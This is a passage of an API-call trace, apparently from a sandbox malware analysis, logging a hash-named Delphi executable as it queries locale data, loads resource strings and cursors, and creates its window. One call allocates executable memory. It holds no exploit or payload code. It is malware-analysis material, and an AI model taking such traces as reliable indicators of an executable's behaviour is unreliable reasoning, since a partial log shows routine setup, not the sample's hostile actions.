dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19fe98*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0073.637] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74650000 [0073.637] GetProcAddress (hModule=0x74650000, lpProcName="GetDiskFreeSpaceExA") returned 0x746769d0 [0073.637] GetThreadLocale () returned 0x409 [0073.637] GetThreadLocale () returned 0x409 [0073.637] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Jan") returned 4 [0073.637] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x19fd70, cchData=256 | out: lpLCData="January") returned 8 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Feb") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x19fd70, cchData=256 | out: lpLCData="February") returned 9 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Mar") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x19fd70, cchData=256 | out: lpLCData="March") returned 6 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Apr") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x19fd70, cchData=256 | out: lpLCData="April") returned 6 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x19fd70, cchData=256 | out: lpLCData="May") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x19fd70, cchData=256 | out: lpLCData="May") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Jun") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x19fd70, cchData=256 | out: lpLCData="June") returned 5 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Jul") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x19fd70, cchData=256 | out: lpLCData="July") returned 5 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Aug") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x19fd70, cchData=256 | out: lpLCData="August") returned 7 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Sep") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x19fd70, cchData=256 | out: lpLCData="September") returned 10 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Oct") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x19fd70, cchData=256 | out: lpLCData="October") returned 8 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Nov") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x19fd70, cchData=256 | out: lpLCData="November") returned 9 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Dec") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x19fd70, cchData=256 | out: lpLCData="December") returned 9 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Sun") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Sunday") returned 7 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Mon") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Monday") returned 7 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Tue") returned 4 [0073.638] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Tuesday") returned 8 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Wed") returned 4 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Wednesday") returned 10 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Thu") returned 4 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Thursday") returned 9 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Fri") returned 4 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Friday") returned 7 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Sat") returned 4 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x19fd70, cchData=256 | out: lpLCData="Saturday") returned 9 [0073.639] GetThreadLocale () returned 0x409 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x19fdcc, cchData=256 | out: lpLCData="$") returned 2 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x19fdcc, cchData=256 | out: lpLCData="0") returned 2 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x19fdcc, cchData=256 | out: lpLCData="0") returned 2 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x19fec4, cchData=2 | out: lpLCData=",") returned 2 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x19fec4, cchData=2 | out: lpLCData=".") returned 2 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x19fdcc, cchData=256 | out: lpLCData="2") returned 2 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x19fec4, cchData=2 | out: lpLCData="/") returned 2 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x19fdcc, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0073.639] GetThreadLocale () returned 0x409 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x19fd98, cchData=256 | out: lpLCData="1") returned 2 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x19fdcc, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0073.639] GetThreadLocale () returned 0x409 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x19fd98, cchData=256 | out: lpLCData="1") returned 2 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x19fec4, cchData=2 | out: lpLCData=":") returned 2 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x19fdcc, cchData=256 | out: lpLCData="AM") returned 3 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x19fdcc, cchData=256 | out: lpLCData="PM") returned 3 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x19fdcc, cchData=256 | out: lpLCData="0") returned 2 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x19fdcc, cchData=256 | out: lpLCData="0") returned 2 [0073.639] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x19fdcc, cchData=256 | out: lpLCData="0") returned 2 [0073.640] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x19fec4, cchData=2 | out: lpLCData=",") returned 2 [0073.640] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76150000 [0073.640] GetProcAddress (hModule=0x76150000, lpProcName="VariantChangeTypeEx") returned 0x76167260 [0073.640] GetProcAddress (hModule=0x76150000, lpProcName="VarNeg") returned 0x761b2470 [0073.640] GetProcAddress (hModule=0x76150000, lpProcName="VarNot") returned 0x761b36e0 [0073.640] GetProcAddress (hModule=0x76150000, lpProcName="VarAdd") returned 0x7618cbb0 [0073.640] GetProcAddress (hModule=0x76150000, lpProcName="VarSub") returned 0x7618e0d0 [0073.640] GetProcAddress (hModule=0x76150000, lpProcName="VarMul") returned 0x7618d800 [0073.640] GetProcAddress (hModule=0x76150000, lpProcName="VarDiv") returned 0x761b2980 [0073.640] GetProcAddress (hModule=0x76150000, lpProcName="VarIdiv") returned 0x761b3320 [0073.642] GetProcAddress (hModule=0x76150000, lpProcName="VarMod") returned 0x761b3580 [0073.642] GetProcAddress (hModule=0x76150000, lpProcName="VarAnd") returned 0x76183690 [0073.642] GetProcAddress (hModule=0x76150000, lpProcName="VarOr") returned 0x761b3790 [0073.642] GetProcAddress (hModule=0x76150000, lpProcName="VarXor") returned 0x761b3930 [0073.642] GetProcAddress (hModule=0x76150000, lpProcName="VarCmp") returned 0x76162ae0 [0073.642] GetProcAddress (hModule=0x76150000, lpProcName="VarI4FromStr") returned 0x76165140 [0073.642] GetProcAddress (hModule=0x76150000, lpProcName="VarR4FromStr") returned 0x76183020 [0073.642] GetProcAddress (hModule=0x76150000, lpProcName="VarR8FromStr") returned 0x76183cd0 [0073.643] GetProcAddress (hModule=0x76150000, lpProcName="VarDateFromStr") returned 0x76178b20 [0073.643] GetProcAddress (hModule=0x76150000, lpProcName="VarCyFromStr") returned 0x76162280 [0073.643] GetProcAddress (hModule=0x76150000, lpProcName="VarBoolFromStr") returned 0x761644d0 [0073.643] GetProcAddress (hModule=0x76150000, lpProcName="VarBstrFromCy") returned 0x761831c0 [0073.643] GetProcAddress (hModule=0x76150000, lpProcName="VarBstrFromDate") returned 0x761799f0 [0073.643] GetProcAddress (hModule=0x76150000, lpProcName="VarBstrFromBool") returned 0x76164480 [0073.643] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x184 [0073.643] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x188 [0073.643] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x18c [0073.644] GetDC (hWnd=0x0) returned 0xa0100d0 [0073.644] GetDeviceCaps (hdc=0xa0100d0, index=90) returned 96 [0073.644] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0073.644] GetDC (hWnd=0x0) returned 0xa0100d0 [0073.644] GetDeviceCaps (hdc=0xa0100d0, index=104) returned 0 [0073.644] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0073.644] CreatePalette (plpal=0x19fb28) returned 0x1c08098f [0073.644] GetStockObject (i=7) returned 0x1b00017 [0073.645] GetStockObject (i=5) returned 0x1900015 [0073.645] GetStockObject (i=13) returned 0x18a0048 [0073.645] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0073.645] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0073.645] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x74790000 [0073.645] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc158 [0073.645] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc129 [0073.646] GetCurrentThreadId () returned 0xab0 [0073.646] GlobalAddAtomA (lpString="WndProcPtr0040000000000AB0") returned 0xc0ad [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xfef2, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xfef1, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xfef0, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff0f, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff0e, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff0d, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff0c, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff0b, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff0a, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff09, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff08, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff07, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0073.646] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0073.647] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0073.648] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0073.648] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0073.648] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0073.648] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0073.648] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0073.648] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0073.648] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0073.648] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0073.648] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1ba [0073.648] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc1bb [0073.648] GetVersion () returned 0x23f00206 [0073.648] GetCurrentProcessId () returned 0x5bc [0073.648] GlobalAddAtomA (lpString="Delphi000005BC") returned 0xc0ac [0073.648] GetCurrentThreadId () returned 0xab0 [0073.648] GlobalAddAtomA (lpString="ControlOfs0040000000000AB0") returned 0xc0ab [0073.648] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000AB0") returned 0xc1c4 [0073.649] GetProcAddress (hModule=0x74790000, lpProcName="GetMonitorInfoA") returned 0x747a7e40 [0073.649] GetProcAddress (hModule=0x74790000, lpProcName="GetSystemMetrics") returned 0x747a9160 [0073.649] GetSystemMetrics (nIndex=19) returned 1 [0074.410] GetSystemMetrics (nIndex=75) returned 1 [0074.410] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2281134, fWinIni=0x0 | out: pvParam=0x2281134) returned 1 [0074.411] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0074.411] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0074.411] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x801cb [0074.414] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0074.414] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0074.414] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0074.414] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x5021d [0074.415] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x5017b [0074.416] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x31022d [0074.417] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x80367 [0074.418] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x6010f [0074.418] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x60237 [0074.419] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0074.419] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0074.419] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0074.419] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0074.419] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0074.419] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0074.420] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0074.420] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0074.420] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0074.420] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0074.420] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0074.420] GetDC (hWnd=0x0) returned 0xa0100d0 [0074.420] GetDeviceCaps (hdc=0xa0100d0, index=90) returned 96 [0074.420] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0074.420] GetProcAddress (hModule=0x74790000, lpProcName="EnumDisplayMonitors") returned 0x747c8d90 [0074.420] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x438cec, dwData=0x2281380) returned 1 [0074.421] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x19fe87, fWinIni=0x0 | out: pvParam=0x19fe87) returned 1 [0074.421] CreateFontIndirectA (lplf=0x19fe87) returned 0x320a06c3 [0074.421] GetObjectA (in: h=0x320a06c3, c=60, pv=0x19fc7c | out: pv=0x19fc7c) returned 60 [0074.421] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x19fd33, fWinIni=0x0 | out: pvParam=0x19fd33) returned 1 [0074.427] CreateFontIndirectA (lplf=0x19fe0f) returned 0x200a0958 [0074.427] GetObjectA (in: h=0x200a0958, c=60, pv=0x19fc7c | out: pv=0x19fc7c) returned 60 [0074.427] CreateFontIndirectA (lplf=0x19fdd3) returned 0x140a0956 [0074.427] GetObjectA (in: h=0x140a0956, c=60, pv=0x19fc7c | out: pv=0x19fc7c) returned 60 [0074.427] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0xb0141 [0074.429] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x19fde0, nSize=0x100 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe")) returned 0x62 [0074.430] OemToCharA (in: pSrc="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", pDst=0x19fde0 | out: pDst="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned 1 [0074.439] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x2100000 [0074.439] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplicationB", lpWndClass=0x19fd98 | out: lpWndClass=0x19fd98) returned 0 [0074.439] RegisterClassA (lpWndClass=0x467c38) returned 0xc1de [0074.439] GetSystemMetrics (nIndex=0) returned 1440 [0074.439] GetSystemMetrics (nIndex=1) returned 900 [0074.439] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplicationB", lpWindowName="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x501e8 [0075.616] SetWindowLongA (hWnd=0x501e8, nIndex=-4, dwNewLong=34607087) returned 4220996 [0075.617] SendMessageA (hWnd=0x501e8, Msg=0x80, wParam=0x1, lParam=0xb0141) returned 0x0 [0075.618] NtdllDefWindowProc_A (hWnd=0x501e8, Msg=0x80, wParam=0x1, lParam=0xb0141) returned 0x0 [0075.621] SetClassLongA (hWnd=0x501e8, nIndex=-14, dwNewLong=721217) returned 0x0 [0075.623] GetSystemMenu (hWnd=0x501e8, bRevert=0) returned 0x601df [0075.675] DeleteMenu (hMenu=0x601df, uPosition=0xf030, uFlags=0x0) returned 1 [0075.675] DeleteMenu (hMenu=0x601df, uPosition=0xf000, uFlags=0x0) returned 1 [0075.675] DeleteMenu (hMenu=0x601df, uPosition=0xf010, uFlags=0x0) returned 1 [0075.676] GetKeyboardLayoutList (in: nBuff=64, lpList=0x19fd60 | out: lpList=0x19fd60) returned 1 [0075.677] GetModuleHandleA (lpModuleName="USER32") returned 0x74790000 [0075.677] GetProcAddress (hModule=0x74790000, lpProcName="AnimateWindow") returned 0x747b8ef0 [0075.677] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0075.677] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff37, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff36, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff35, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff34, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff33, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff32, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff31, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff30, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff4f, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff4e, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0075.678] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x19fb24, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0075.678] LoadStringA 